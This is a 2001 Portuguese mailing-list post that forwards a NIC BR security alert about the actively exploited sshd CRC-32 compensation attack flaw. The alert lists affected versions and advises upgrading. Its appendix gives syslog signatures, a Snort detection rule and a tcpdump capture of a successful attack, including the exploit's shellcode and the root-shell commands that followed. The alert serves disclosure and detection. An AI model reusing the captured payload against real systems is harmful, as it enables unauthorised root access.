Segue abaixo o alerta mais comentado:

Alerta de Seguranca 2001-11-16
NIC BR Security Office <[EMAIL PROTECTED]>

Vulnerabilidade remota no sshd sendo amplamente explorada
=========================================================


1. Introducao

   O SSH e um protocolo que tem sido muito utilizado para substituir
   outras formas de login remoto.  Nos ultimos meses diversos
   problemas de seguranca, em diversas versoes de ssh, foram
   relatados.

   Este alerta tem o intuito de:

   * reforcar a necessidade de atualizacao das versoes de ssh;

   * salientar que existem programas que exploram estas falhas e que
     estao sendo amplamente utilizados para comprometer maquinas
     vulneraveis;

   * mostrar assinaturas que podem ser uteis para identificar maquinas
     comprometidas.


2. Descricao

   Nas ultimas semanas aumentou o numero de maquinas que foram
   comprometidas por estarem com versoes vulneraveis do ssh.  O NBSO
   teve acesso a diversos artefatos deixados por invasores em maquinas
   comprometidas.  Dentre o material encontrado vale ressaltar a
   presenca de:

     * exploits para explorar a vulnerabilidade do "CRC-32
       compensation attack";

     * arquivos contendo mapeamento de versoes de sshd de diversas redes
       brasileiras e respectivas ferramentas de scan.

   Nessas mesmas redes foi possivel capturar a assinatura do exploit
   em acao.


3. Assinaturas

   Assinaturas de tentativas bem como de um ataque bem sucedido sao
   mostradas no Apendice e na secao "links adicionais".


4. Sistemas Afetados

   As seguintes versoes sao vulneraveis:

   OpenSSH: versoes menores que 2.3.0;
   ssh.com: versao 1.2.24 ate' 1.2.31 (ssh-2.x nao e' vulneravel)

   Mais detalhes bem como outras implementacoes de ssh afetadas estao
   listados no seguinte advisory da CORE-SDI:


http://www.core-sdi.com/pressroom/advisories_desplegado.php?idx=81&idxsectio
n=10

   Para descobrir sua versao de ssh digite: ssh -V


5. Impacto

   Acesso de root remoto em maquinas rodando versoes vulneraveis de
   ssh.


6. Solucao

   Recomenda-se atualizar o ssh em uso para a ultima versao
   disponivel.


7. Informacoes adicionais

   Nesse mesmo periodo a comunidade internacional de seguranca tambem
   tem lancado alertas sobre o crescente numero de comprometimentos de
   maquinas atraves de versoes vulneraveis de ssh:

   * CERT/CC Incident Note IN-2001-12, "Exploitation of vulnerability
     in SSH1 CRC-32 compensation attack detector"
     http://www.cert.org/incident_notes/IN-2001-12.html

   * Vulnerability Note VU#945216, "SSH CRC32 attack detection code
     contains remote integer overflow"
     http://www.kb.cert.org/vuls/id/945216


8. Agradecimentos

   Pedro A M Vazquez
   Nelson Murilo
   Mario L Lacroix
   Fabio David


Apendice

    Nas mensagens geradas pelo syslog de maquinas atacadas foram
    encontradas as entradas:

    foo sshd[xxxxx]: Disconnecting: Corrupted check bytes on input.
    foo sshd[xxxxx]: fatal: Local: Corrupted check bytes on input.
    foo sshd[xxxxx]: fatal: Local: crc32 compensation attack: network attack
detected

    A seguinte regra do snort detecta a resposta de uma maquina
    comprometida com sucesso por este exploit:

    alert tcp any any -> any any (msg:"MISC - MISC - id check returned
root"; content: "uid=0(root)";)


   Trecho de um ataque bem sucedido capturado via tcpdump.  Esse
   trecho refere-se apenas a parte final quando o invasor obtem a
   shell de root:

   17:52:53.658100 127.0.0.1.1182 > 127.0.0.1.22: tcp 1732 (DF)
     0000: 4500 06f8 3274 4000 4006 038a 7f00 0001  E...2t@.@.......
     0010: 7f00 0001 049e 0016 ed2e 58fb ed62 8b60  ..........X..b.`
     0020: 8018 7960 9890 0000 0101 080a 0003 9637  ..y`...........7
     0030: 0003 9637 9090 9090 9090 9090 9090 9090  ...7............
     0040: 9090 9090 9090 9090 9090 9090 9090 9090  ................

     [ 98 linhas identicas apenas com NOPs (0x90) removidas]

     0670: 9090 9090 9090 9090 9090 9090 9090 9090  ................
     0680: 31db b307 89e2 6a10 89e1 5152 68fe 0000  1.....j...QRh...
     0690: 0089 e131 c0b0 66cd 80a8 ff74 0b5a f6c2  ...1..f....t.Z..
     06a0: ff74 4efe ca52 ebeb 5b31 c9b1 03fe c931  .tN..R..[1.....1
     06b0: c0b0 3fcd 8067 e302 ebf3 6a04 6a00 6a12  ..?..g....j.j.j.
     06c0: 6a01 53b8 6600 0000 bb0e 0000 0089 e1cd  j.S.f...........
     06d0: 806a 006a 0068 2f73 6800 682f 6269 6e8d  .j.j.h/sh.h/bin.
     06e0: 4c24 088d 5424 0c89 2189 e331 c0b0 0bcd  L$..T$..!..1....
     06f0: 8031 c0fe c0cd 8000                      .1......

   17:52:53.658606 127.0.0.1.22 > 127.0.0.1.1182: tcp 0 (DF) [tos 0x10]
     0000: 4510 0034 3275 4000 4006 0a3d 7f00 0001  E..42u@.@..=....
     0010: 7f00 0001 0016 049e ed62 8b60 ed2e 5fbf  .........b.`.._.
     0020: 8010 1e40 63a0 0000 0101 080a 0003 9637  [EMAIL PROTECTED]
     0030: 0003 9637                                ...7

   17:52:53.658813 127.0.0.1.22 > 127.0.0.1.1182: tcp 0 (DF) [tos 0x10]
     0000: 4510 0034 3276 4000 4006 0a3c 7f00 0001  E..42v@.@..<....
     0010: 7f00 0001 0016 049e ed62 8b60 ed2e 5fbf  .........b.`.._.
     0020: 8010 3c80 4560 0000 0101 080a 0003 9637  ..<.E`.........7
     0030: 0003 9637                                ...7

   17:52:53.659391 127.0.0.1.22 > 127.0.0.1.1182: tcp 0 (DF) [tos 0x10]
     0000: 4510 0034 3277 4000 4006 0a3b 7f00 0001  E..42w@.@..;....
     0010: 7f00 0001 0016 049e ed62 8b60 ed2e 5fbf  .........b.`.._.
     0020: 8010 7900 08e0 0000 0101 080a 0003 9637  ..y............7
     0030: 0003 9637                                ...7

   17:52:55.651755 127.0.0.1.1182 > 127.0.0.1.22: tcp 17 (DF)
     0000: 4500 0045 3278 4000 4006 0a39 7f00 0001  E..E2x@[email protected]....
     0010: 7f00 0001 049e 0016 ed2e 5fbf ed62 8b60  .........._..b.`
     0020: 8018 7960 cbfa 0000 0101 080a 0003 96ff  ..y`............
     0030: 0003 9637 6563 686f 2043 4852 4953 2043  ...7echo CHRIS C
     0040: 4852 4953 0a                             HRIS.

   17:52:55.652233 127.0.0.1.22 > 127.0.0.1.1182: tcp 12 (DF) [tos 0x10]
     0000: 4510 0040 3279 4000 4006 0a2d 7f00 0001  E..@2y@[email protected]....
     0010: 7f00 0001 0016 049e ed62 8b60 ed2e 5fd0  .........b.`.._.
     0020: 8018 7900 35dd 0000 0101 080a 0003 96ff  ..y.5...........
     0030: 0003 96ff 4348 5249 5320 4348 5249 530a  ....CHRIS CHRIS.

   17:52:55.652433 127.0.0.1.1182 > 127.0.0.1.22: tcp 68 (DF)
     0000: 4500 0078 327a 4000 4006 0a04 7f00 0001  E..x2z@.@.......
     0010: 7f00 0001 049e 0016 ed2e 5fd0 ed62 8b6c  .........._..b.l
     0020: 8018 7960 6f2f 0000 0101 080a 0003 96ff  ..y`o/..........
     0030: 0003 96ff 6563 686f 3b20 6563 686f 2027  ....echo; echo '
     0040: 2a2a 2a2a 2a20 594f 5520 4152 4520 494e  ***** YOU ARE IN
     0050: 202a 2a2a 2a2a 273b 2065 6368 6f20 3b20   *****'; echo ;
     0060: 686f 7374 6e61 6d65 203b 2075 6e61 6d65  hostname ; uname
     0070: 202d 613b 2069 640a                       -a; id.

   17:52:55.653006 127.0.0.1.22 > 127.0.0.1.1182: tcp 1 (DF) [tos 0x10]
     0000: 4510 0035 327b 4000 4006 0a36 7f00 0001  E..52{@[email protected]....
     0010: 7f00 0001 0016 049e ed62 8b6c ed2e 6014  .........b.l..`.
     0020: 8018 7900 fce5 0000 0101 080a 0003 96ff  ..y.............
     0030: 0003 96ff 0a                             .....

   17:52:55.653264 127.0.0.1.22 > 127.0.0.1.1182: tcp 23 (DF) [tos 0x10]
     0000: 4510 004b 327c 4000 4006 0a1f 7f00 0001  E..K2|@.@.......
     0010: 7f00 0001 0016 049e ed62 8b6d ed2e 6014  .........b.m..`.
     0020: 8018 7900 8bab 0000 0101 080a 0003 96ff  ..y.............
     0030: 0003 96ff 2a2a 2a2a 2a20 594f 5520 4152  ....***** YOU AR
     0040: 4520 494e 202a 2a2a 2a2a 0a              E IN *****.

   17:52:55.653471 127.0.0.1.22 > 127.0.0.1.1182: tcp 1 (DF) [tos 0x10]
     0000: 4510 0035 327d 4000 4006 0a34 7f00 0001  E..52}@[email protected]....
     0010: 7f00 0001 0016 049e ed62 8b84 ed2e 6014  .........b....`.
     0020: 8018 7900 fccd 0000 0101 080a 0003 96ff  ..y.............
     0030: 0003 96ff 0a                             .....

   17:52:55.656806 127.0.0.1.22 > 127.0.0.1.1182: tcp 4 (DF) [tos 0x10]
     0000: 4510 0038 327e 4000 4006 0a30 7f00 0001  E..82~@[email protected]....
     0010: 7f00 0001 0016 049e ed62 8b85 ed2e 6014  .........b....`.
     0020: 8018 7900 3150 0000 0101 080a 0003 96ff  ..y.1P..........
     0030: 0003 96ff 666f 6f0a                      ....foo.

   17:52:55.660045 127.0.0.1.22 > 127.0.0.1.1182: tcp 65 (DF) [tos 0x10]
     0000: 4510 0075 327f 4000 4006 09f2 7f00 0001  E..u2.@.@.......
     0010: 7f00 0001 0016 049e ed62 8b89 ed2e 6014  .........b....`.
     0020: 8018 7900 8e0d 0000 0101 080a 0003 96ff  ..y.............
     0030: 0003 96ff 4c69 6e75 7820 666f 6f20 322e  ....Linux foo 2.
     0040: 322e 3136 2d32 3220 2331 2054 7565 2041  2.16-22 #1 Tue A
     0050: 7567 2032 3220 3136 3a34 393a 3036 2045  ug 22 16:49:06 E
     0060: 4454 2032 3030 3020 6936 3836 2075 6e6b  DT 2000 i686 unk
     0070: 6e6f 776e 0a                             nown.

   17:52:55.665203 127.0.0.1.22 > 127.0.0.1.1182: tcp 88 (DF) [tos 0x10]
     0000: 4510 008c 3280 4000 4006 09da 7f00 0001  E...2.@.@.......
     0010: 7f00 0001 0016 049e ed62 8bca ed2e 6014  .........b....`.
     0020: 8018 7900 5a8d 0000 0101 080a 0003 9700  ..y.Z...........
     0030: 0003 96ff 7569 643d 3028 726f 6f74 2920  ....uid=0(root)
     0040: 6769 643d 3028 726f 6f74 2920 6772 6f75  gid=0(root) grou
     0050: 7073 3d30 2872 6f6f 7429 2c31 2862 696e  ps=0(root),1(bin
     0060: 292c 3228 6461 656d 6f6e 292c 3328 7379  ),2(daemon),3(sy
     0070: 7329 2c34 2861 646d 292c 3628 6469 736b  s),4(adm),6(disk
     0080: 292c 3130 2877 6865 656c 290a            ),10(wheel).

   17:52:55.671619 127.0.0.1.1182 > 127.0.0.1.22: tcp 0 (DF)
     0000: 4500 0034 3281 4000 4006 0a41 7f00 0001  E..42.@[email protected]....
     0010: 7f00 0001 049e 0016 ed2e 6014 ed62 8c22  ..........`..b."
     0020: 8010 7960 05d7 0000 0101 080a 0003 9701  ..y`............
     0030: 0003 96ff


Sem mais,

Andr� Luiz Rodrigues Ferreira
[Network Analist/Programmer/Security Consulting]
[EMAIL PROTECTED] - http://freecode.linuxsecurity.com.br

"O melhor da vida � aprender bem mais do que j� se sabe...."
----- Original Message -----
From: "Joselito Batista" <[EMAIL PROTECTED]>
To: "Linux" <[EMAIL PROTECTED]>
Sent: Tuesday, November 27, 2001 4:08 PM
Subject: (linux-br) Falha de seguran�a afeta servidores Unix


> Galera... existe algum pack corretivo pra isso ?
>
> plant�o info / TI
>
>
> Falha de seguran�a afeta servidores Unix
> Segunda-feira, 26 de novembro de 2001 - 18h50
> S�O PAULO � O CERT � Computer Emergency Response Team divulgou alerta
sobre
> a exist�ncia de uma brecha de seguran�a no protocolo SSH, que � usado para
> autenticar logins remotos. Em raz�o dessa falha, v�rios sistemas baseados
em
> Linux e Unix est�o sendo invadidos por hackers.
>
> O problema localiza-se no m�dulo chamado CRC-32 compensation attack
> detector, cuja fun��o � justamente detectar ataques ao servidor. Na
pr�tica,
> a falha permite que o invasor adquira privil�gios de administrador do
> sistema. Isso lhes d� condi��es de �plantar� cavalos-de-tr�ia e
ferramentas
> controladas a dist�ncia.
>
> Um alerta sobre o mesmo assunto foi emitido tamb�m pela Equipe de
Seguran�a
> em Sistemas e Redes da Unicamp. Para mais informa��es t�cnicas, clique nos
> links para ler o documento do CERT e o alerta da Unicamp.
>
> http://www2.uol.com.br/info/aberto/infonews/112001/26112001-19.shl
>
>
>


Assinantes em 28/11/2001: 2403
Mensagens recebidas desde 07/01/1999: 143675
Historico e [des]cadastramento: http://linux-br.conectiva.com.br
Assuntos administrativos e problemas com a lista: 
            mailto:[EMAIL PROTECTED]

Responder a